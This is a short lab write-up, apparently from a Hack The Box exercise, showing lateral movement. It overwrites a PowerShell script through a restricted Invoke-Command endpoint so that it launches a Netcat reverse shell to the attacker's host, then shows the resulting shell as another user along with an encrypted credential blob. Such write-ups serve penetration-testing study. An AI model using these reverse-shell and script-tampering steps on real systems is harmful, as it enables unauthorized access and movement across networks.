InfoSec LAB

Acute_Lateral_Movement_jmorgan

Created: 2 min read

jmorgan

Upon gaining the initial foothold on to the ATSSERVER host as the imonks user via the PowerShell’s Invoke-Command cmdlet, I discovered a PowerShell script that executes an remote arbitrary command to the Acute-PC01 host as the jmorgan user. While the supplied PSCredential object cannot be directly used due to the encrypted nature in the restricted environment with a limited access to PowerShell cmdlets, it can still be abused as the current user, imonks, has access to the PowerShell script

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {(Get-Content -Path C:\Users\imonks\Desktop\wm.ps1) -Replace 'Get-Volume', 'C:\Utils\nc64.exe 10.10.16.8 8888 -e powershell' | Set-Content -Path C:\Users\imonks\Desktop\wm.ps1}

Leveraging both Get-Content and Set-Content cmdlets, replacing a string in a file can be achieved The command above will replace the Get-Volume string with a Netcat reverse shell command

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {C:\Utils\nc64.exe 10.10.16.8 8888 -e powershell} -ComputerName Acute-PC01 -Credential $creds

Confirming the changes

PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -Credential $Cred -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1}
 
The command completed successfully.

Executing the modified PowerShell script Done

┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ nnc 8888          
listening on [any] 8888 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.145] 49855
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\Users\jmorgan\Documents> whoami
whoami
acute\jmorgan
PS C:\Users\jmorgan\Documents> hostname
hostname
Acute-PC01
PS C:\Users\jmorgan\Documents> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet 2:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::9513:4361:23ec:64fd%14
   IPv4 Address. . . . . . . . . . . : 172.16.22.2
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.22.1

Lateral Movement made to the Acute-PC01 host as the jmorgan user via overwriting a PowerShell script

Interactive Graph View

Backlinks